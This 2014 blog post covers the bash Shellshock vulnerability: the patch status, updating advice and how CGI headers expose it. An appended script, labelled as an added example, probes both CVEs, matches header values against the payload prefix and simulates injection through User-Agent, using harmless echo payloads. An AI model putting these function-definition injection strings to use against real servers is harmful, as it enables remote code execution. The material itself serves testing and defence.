Sep 24 2014

More detailed info: specially-crafted-environment-variables-code-injection-attack/

Stephane Chazelas discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name. In many common configurations, this vulnerability is exploitable over the network.

Chet Ramey, the GNU bash upstream maintainer, will soon release official upstream patches.

Just a heads up: most if not all mirrors for RHEL/CentOS were updated last night, and scheduled cron updates should pick the new bash package up.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

will test for this issue: a vulnerable bash prints "vulnerable" before "this is a test", because the code trailing the function body is executed while bash imports the variable at startup. A patched bash prints only the test string.


As of approx. 23:10 Eastern Time, 2014-09-24, a follow-up CVE has been submitted regarding CVE-2014-6271. Quoting Red Hat:

“Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions.”

The follow-up has been assigned CVE-2014-7169. A patch is in the works according to vendors, but has not yet been pushed. Expect another bash package revision in the pipelines shortly.

In the meantime, Red Hat provides details of a workaround, but cautions that it has received very little testing and is no substitute for the impending patch. I'm choosing not to quote it here for exactly that reason, but you can read about it in the Red Hat pages linked above.

Fixed? We shall see…

~ >> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Red Hat has suggested rebooting or running ldconfig after the update (ldconfig creates, updates, and removes the links and cache for the most recent shared libraries). However, simply updating the bash rpm fixes every newly invoked bash instance, since each new process executes the updated binary. Only long-running bash processes started before the update keep the old code in memory, and those need to be restarted; for the majority of potential issues the package update alone is enough.

Exploit details:
The bug is exploited by anything that first places an attacker-controlled value from the network in an environment variable and then executes bash (or a script that runs under bash). Simply calling bash isn't the problem; calling it with hostile data already in its environment is. So some things (like PHP, apparently) aren't necessarily vulnerable, but other things (like CGI shell scripts) are vulnerable as all get out: the CGI interface copies request headers such as User-Agent straight into variables like HTTP_USER_AGENT before the script is started, so a crafted header is executed before the script's first line. For example, a lot of wireless routers shell out to "ping" and "traceroute" from their web interfaces; these are all likely vulnerable.
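The following script is an added example, not code from the original post: it wraps the CVE-2014-6271 probe shown earlier and the CVE-2014-7169 probe that circulated publicly at the time into functions that report "vulnerable" or "not vulnerable" for a chosen bash binary, and it simulates the CGI path described above by placing a crafted User-Agent value into HTTP_USER_AGENT (the standard CGI variable name) and running a tiny bash CGI script with it. The function names, the scratch CGI script and the sample header values are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): run the two public Shellshock
# probes against a chosen bash binary and simulate the CGI attack path.

# CVE-2014-6271 probe. The variable name ("x") is irrelevant: a vulnerable
# bash imports any variable whose value starts with "() {" as a function and
# executes whatever follows the closing brace during startup.
check_6271() {
    local bash_bin="${1:-bash}" out
    out="$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo this is a test' 2>/dev/null)"
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "not vulnerable" ;;
    esac
}

# CVE-2014-7169 probe (the parser bug the first patch left behind). On a
# vulnerable bash the dangling redirection turns "echo date" into writing
# date's output to a file literally named "echo", so run it in a scratch
# directory and check whether that file appeared.
check_7169() {
    local bash_bin="${1:-bash}" scratch
    scratch="$(mktemp -d)"
    ( cd "$scratch" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$scratch/echo" ]; then echo "vulnerable"; else echo "not vulnerable"; fi
    rm -rf "$scratch"
}

# Triage helper for a request header value: the import only triggers when
# the value begins with the exact four characters "() {". Returns 0 when the
# value looks like a Shellshock payload, 1 otherwise.
looks_like_shellshock() {
    case "$1" in
        '() {'*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Simulate the CGI vector: the server copies the request's User-Agent header
# into HTTP_USER_AGENT and then executes the script. A bash CGI script
# inherits that variable; on a vulnerable bash the injected command runs
# before the script's first line. Arguments: bash binary, User-Agent value
# (defaults to a constructed payload that echoes INJECTED).
simulate_cgi() {
    local bash_bin="${1:-bash}" user_agent="$2" script
    [ -n "$user_agent" ] || user_agent='() { :;}; echo INJECTED'
    script="$(mktemp)"
    cat >"$script" <<'EOF'
echo "Content-Type: text/plain"
echo
echo "hello from cgi"
EOF
    HTTP_USER_AGENT="$user_agent" "$bash_bin" "$script"
    rm -f "$script"
}

# Stand-alone usage: probe the system bash and run the CGI demo.
if command -v bash >/dev/null 2>&1; then
    echo "CVE-2014-6271: $(check_6271 bash)"
    echo "CVE-2014-7169: $(check_7169 bash)"
    simulate_cgi bash
fi
```

Point the functions at another binary (e.g. `check_6271 /path/to/old/bash`) to compare a pre-patch build against the installed one; on a current bash both probes report "not vulnerable" and the CGI demo prints only the script's own output.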

 Posted by at 3:02 pm